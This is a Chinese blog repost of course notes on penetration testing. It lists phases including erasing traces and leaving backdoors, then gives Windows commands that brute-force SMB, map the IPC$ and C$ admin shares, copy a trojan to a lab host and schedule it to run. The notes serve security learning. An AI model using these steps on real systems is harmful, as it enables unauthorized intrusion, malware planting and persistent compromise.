[网络安全学习篇9]:渗透测试(千峰网络安全视频笔记 9 day)

目录

 

渗透测试


渗透测试

0、授权

1、信息收集

nslookup whois

2、扫描漏洞

namp = ip范围 端口 80(IIS,apache,什么网站)

scanpot

高级扫描:如IIS漏洞2003-IIS6.0 2008-IIS7.0

扫描网站漏洞

3、漏洞利用

4、提权(shell(命令行cmd)环境、桌面环境、最高权限)

5、毁尸灭迹

6、留后门

7、渗透测试报告

手工测试端口号开放:

telnet IP 地址 测试端口

445漏洞利用之一IPC$

1、scanport 扫描445端口

2、进行暴力破解:NTscan

3、

net use f: \\10.1.1.2\ipc$ 密码 /user:用户
=================================================
net use f: \\10.1.1.2\share 密码 /user:用户
net use * /del
net use * /del
net use f: \\10.1.1.2\c$ 密码 /user:用户
=================================================

4、制作木马

5、植入木马(留后门)

copy d:\heihei.exe \\10.1.1.2\c$

6、设计计划任务自动执行木马:

net time \\10.1,1.2
at \\10.1.1.2 11:11 "c:\heihei.exe"

7、等待肉鸡上线

发布了44 篇原创文章 · 获赞 21 · 访问量 2451

猜你喜欢

转载自blog.csdn.net/weixin_43252204/article/details/105341122